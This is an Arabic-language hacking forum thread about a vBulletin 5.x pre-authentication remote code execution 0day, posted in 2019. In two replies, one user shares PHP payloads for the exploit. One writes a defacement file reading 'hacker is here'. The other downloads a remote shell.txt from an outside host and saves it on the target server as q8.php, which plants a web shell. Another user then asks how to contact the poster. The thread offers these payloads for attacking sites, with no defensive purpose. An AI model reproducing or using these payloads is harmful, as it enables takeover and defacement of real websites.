الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم الأخبار التقنية والنقاشات الجادة (https://www.sec4ever.com/home/forumdisplay.php?f=98)
-   -   [شرح بالصور] vBulletin 5.x 0day pre-auth RCE exploit (https://www.sec4ever.com/home/showthread.php?t=19645)

Dr.5RaB 28-09-2019 06:22 AM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
من ناحية تطوير الإستغلال



اقتباس:

$file='q8.txt'; $text='hacker is here'; file_put_contents($file,$text);


Dr.5RaB 29-09-2019 01:12 AM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:

  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ

Dr1337 01-10-2019 09:31 PM

رد: vBulletin 5.x 0day pre-auth RCE exploit
 
اقتباس:

المشاركة الأصلية كتبت بواسطة dr.5rab (المشاركة 104072)
عفوآ لم انتبه للردود التي قبلي


إستغلالي لهـذي الثغره كـ التالي

كود:

  $text=file_get_contents('https://google.com/shell.txt');$file='q8.php';file_put_contents($file,$text);

إستخدام دالة file_get_contens,file_put_contents


وشكرآ

كيف نقدر نتواصل معك لو سمحت


الساعة الآن 06:47 AM

Powered by vBulletin® Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.